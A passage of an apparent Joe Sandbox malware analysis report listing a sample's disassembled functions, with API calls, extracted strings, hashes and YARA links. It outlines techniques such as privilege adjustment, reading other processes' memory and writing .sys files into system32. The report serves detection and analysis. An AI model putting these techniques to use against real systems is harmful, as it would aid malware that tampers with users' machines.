                                                                                  • API ID: _memset_strncmp_swscanf_vscan_fnrecv
                                                                                  • String ID: Content-Range: bytes $Content-Range: bytes %I64d-%I64d/%I64d$HTTP/$HTTP/%f %d $http://
                                                                                  • API String ID: 3799276779-4277459499
                                                                                  • Opcode ID: a4d51cc7489cd5ce5dc429d99e623d1c833bdcd209708fcc96841be5cc254e8e
                                                                                  • Instruction ID: 64ce07ac3da96626305d2d322036789f0f565dcf8be792a911a9c7a29fdfc337
                                                                                  • Opcode Fuzzy Hash: a4d51cc7489cd5ce5dc429d99e623d1c833bdcd209708fcc96841be5cc254e8e
                                                                                  • Instruction Fuzzy Hash: 42916CB150A3419FD320CF68C88495BB7F5BBC5314F514A2DF1AA87291EF72E90A8B52
                                                                                  Function 6A6DC230 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 122COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC282
                                                                                  • OutputDebugStringA.KERNEL32(6A71C93C), ref: 6A6DC2A0
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DC2A7
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC2C1
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC310
                                                                                  • OutputDebugStringA.KERNEL32(6A71C924), ref: 6A6DC32E
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DC335
                                                                                    • Part of subcall function 6A6D2A20: _memset.LIBCMT ref: 6A6D2A49
                                                                                    • Part of subcall function 6A6D2A20: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 6A6D2A5E
                                                                                    • Part of subcall function 6A6D2A20: wsprintfA.USER32 ref: 6A6D2A7F
                                                                                    • Part of subcall function 6A6D2A20: GetTickCount.KERNEL32 ref: 6A6D2A8B
                                                                                    • Part of subcall function 6A6D2A20: GetCurrentProcessId.KERNEL32 ref: 6A6D2A98
                                                                                    • Part of subcall function 6A6D2A20: __wfopen_s.LIBCMT ref: 6A6D2AE8
                                                                                    • Part of subcall function 6A6D2A20: OutputDebugStringA.KERNEL32(?), ref: 6A6D2AFC
                                                                                    • Part of subcall function 6A6D2A20: OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2B03
                                                                                  • OutputDebugStringA.KERNEL32(CreateGameDllMap: not support yet), ref: 6A6DC391
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DC398
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s$Current$CountDirectoryProcessTick_memsetwsprintf
                                                                                  • String ID: C:\pl.txt$CreateGameDllMap: not support yet
                                                                                  • API String ID: 3595199882-2831999525
                                                                                  • Opcode ID: 3a17f3642c0c0894a8ebd4422544b8e22a73330a842e3ad20789d8cb8167db31
                                                                                  • Instruction ID: 2bce513d573f4d30444648dd233bf23975e01e3d74b37f0b87cea1fddc6dce8e
                                                                                  • Opcode Fuzzy Hash: 3a17f3642c0c0894a8ebd4422544b8e22a73330a842e3ad20789d8cb8167db31
                                                                                  • Instruction Fuzzy Hash: 8F31EAB390820467DB10DBA5DC80E6B77E9EBC6265F0A0929FA4593211DF20FD1DC7D2
                                                                                  Function 6A6D5DD0 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 176fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,6A6D653A,?), ref: 6A6D5DE6
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,6A6D653A,?), ref: 6A6D5DFD
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,6A6D653A,?), ref: 6A6D5E0E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: 361m2com$Askm2com$HGEM2$Www.MirGom.Com
                                                                                  • API String ID: 1378416451-3242331594
                                                                                  • Opcode ID: e3155a935fb56149bfdb0650676a58454c4da8a20cd64488695dfb94afef2e37
                                                                                  • Instruction ID: fb93301f609f6c31d7a136ff42286070f6cdbf4aea145db2ea52ef1e6ca73d7b
                                                                                  • Opcode Fuzzy Hash: e3155a935fb56149bfdb0650676a58454c4da8a20cd64488695dfb94afef2e37
                                                                                  • Instruction Fuzzy Hash: 19514B716042045FE3006A78DC88BAA77D9DB863B5F140635F851CF7A2EF76DC0947A1
                                                                                  Function 0BEB5954 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0BEB596B
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0BEB5975
                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0BEB5995
                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0BEB59AC
                                                                                  • GetDC.USER32(00000000), ref: 0BEB59B8
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0BEB59E5
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0BEB5A0B
                                                                                  • SelectObject.GDI32(?,?), ref: 0BEB5A26
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB5A35
                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0BEB5A61
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB5A6F
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB5A7D
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB5A93
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB5A9C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                  • String ID:
                                                                                  • API String ID: 644427674-0
                                                                                  • Opcode ID: a47357e9efbf185a66b5b986cd689ea131b4a1227af2a9a0ee79397e5b8497ef
                                                                                  • Instruction ID: e21c0bdf7b8959dc52986d33b5e71ef2d65a03843e72648878bbc2938b2324fc
                                                                                  • Opcode Fuzzy Hash: a47357e9efbf185a66b5b986cd689ea131b4a1227af2a9a0ee79397e5b8497ef
                                                                                  • Instruction Fuzzy Hash: C141B971E50209AFDB51EBE8D892FAFB7FCAB09710F415465B614E7240D774AD088BA0
                                                                                  Function 6A6E1BA0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 117fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E1BC8
                                                                                  • _memset.LIBCMT ref: 6A6E1BE2
                                                                                  • _memset.LIBCMT ref: 6A6E1BFC
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 6A6E1C11
                                                                                    • Part of subcall function 6A6DAF10: _memset.LIBCMT ref: 6A6DAF34
                                                                                    • Part of subcall function 6A6DAF10: wsprintfA.USER32 ref: 6A6DAFBF
                                                                                  • wsprintfA.USER32 ref: 6A6E1C68
                                                                                  • DeleteFileA.KERNEL32(?), ref: 6A6E1D18
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$wsprintf$DeleteDirectoryFileWindows
                                                                                  • String ID: %s\system32\%s$.sys$a3gree$dxtta$i3lseks.zip$wxiisd.zip
                                                                                  • API String ID: 1056433381-1250312934
                                                                                  • Opcode ID: 9e942fb40bf5ff68e316fb23f4fe419848d651422e85cc1296ed06f391348ec1
                                                                                  • Instruction ID: a42f520eef3f6bdc9252009a94661e6115d06b5c7adec986b89b1547d7183739
                                                                                  • Opcode Fuzzy Hash: 9e942fb40bf5ff68e316fb23f4fe419848d651422e85cc1296ed06f391348ec1
                                                                                  • Instruction Fuzzy Hash: 4A41E6B160D3455BD720DF648888ADBB7E8BB95348F46082CE599C7201EF74994EC7B2
                                                                                  Function 6A6D8E50 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 116COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D8F13
                                                                                  • ReadProcessMemory.KERNEL32(00000000,00471CDC,isre,00000012,00471844), ref: 6A6D8F58
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D8F98
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$Process$Virtual$AllocateInformationOpenQueryReadSystem$AdjustCloseFreeHandlePrivilege
                                                                                  • String ID: .$E$G$H$e$isre$r$s$v
                                                                                  • API String ID: 2751502915-1798147963
                                                                                  • Opcode ID: 9de2d630185ed565135bb38f3d5cfb444dec0a2bf0afaf458f83848f5f1ae715
                                                                                  • Instruction ID: b06b3a292e9f35a02c85740d33f08ec0f5e76398a2bf7df9d3f09a5fe49eeaf0
                                                                                  • Opcode Fuzzy Hash: 9de2d630185ed565135bb38f3d5cfb444dec0a2bf0afaf458f83848f5f1ae715
                                                                                  • Instruction Fuzzy Hash: C441E62110C3C09EE341DF28C484A6FBFE29F96788F48599DF1C557262D766D509C727
                                                                                  Function 6A6D1030 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 98COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D106B
                                                                                    • Part of subcall function 6A6D5440: CoCreateInstance.OLE32(6A71AF30,00000000,00000001,6A71AF20,?,?), ref: 6A6D5479
                                                                                  • _memset.LIBCMT ref: 6A6D109F
                                                                                  • _strncpy.LIBCMT ref: 6A6D10C0
                                                                                  • _strncpy.LIBCMT ref: 6A6D10CC
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D10EB
                                                                                  • OutputDebugStringA.KERNEL32(GetShortCutFile has arguments), ref: 6A6D1105
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D110C
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D112A
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6D113E
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D1145
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy$CreateInstance
                                                                                  • String ID: C:\pl.txt$GetShortCutFile has arguments
                                                                                  • API String ID: 2386831223-3219341379
                                                                                  • Opcode ID: 994138fd7480203e42bb0949552263d49ed01b7072132adc33201a8d8b1c99c1
                                                                                  • Instruction ID: 3a22b798c6d1ea63822e241fd487078bf5d38adaaa6aac59d3b16485333af2df
                                                                                  • Opcode Fuzzy Hash: 994138fd7480203e42bb0949552263d49ed01b7072132adc33201a8d8b1c99c1
                                                                                  • Instruction Fuzzy Hash: 1031C471448300ABD210DB549D45FAB7BF8AFD6248F050919F69493241DF71AA1CCBE3
                                                                                  Function 6A6D8D30 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D8DFC
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D8E31
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead
                                                                                  • String ID: yX$2$:$a$c$h$m$o$p$x
                                                                                  • API String ID: 3726627124-3589007719
                                                                                  • Opcode ID: 006ef2e45278129c822924e02ae2e7cd696a1adb695aafdf0baf7be9f8eb1629
                                                                                  • Instruction ID: 8336e62996145771d454de18d64741ee34839071a31bff24f19b8fcc1263adaf
                                                                                  • Opcode Fuzzy Hash: 006ef2e45278129c822924e02ae2e7cd696a1adb695aafdf0baf7be9f8eb1629
                                                                                  • Instruction Fuzzy Hash: 5231457150D3C09ED341DF68848468FBFE16FEA248F88199DF0C897352D665DA09CB67
                                                                                  Function 6A6D9F50 Relevance: 19.6, APIs: 3, Strings: 8, Instructions: 392COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6E02D0: _memset.LIBCMT ref: 6A6E0354
                                                                                    • Part of subcall function 6A6E02D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 6A6E0366
                                                                                    • Part of subcall function 6A6E02D0: Module32First.KERNEL32 ref: 6A6E0380
                                                                                    • Part of subcall function 6A6E02D0: Module32Next.KERNEL32(00000000,?), ref: 6A6E03D9
                                                                                    • Part of subcall function 6A6E02D0: CloseHandle.KERNEL32(00000000), ref: 6A6E03E3
                                                                                  • _strncmp.LIBCMT ref: 6A6DA012
                                                                                  • _strncmp.LIBCMT ref: 6A6DA033
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
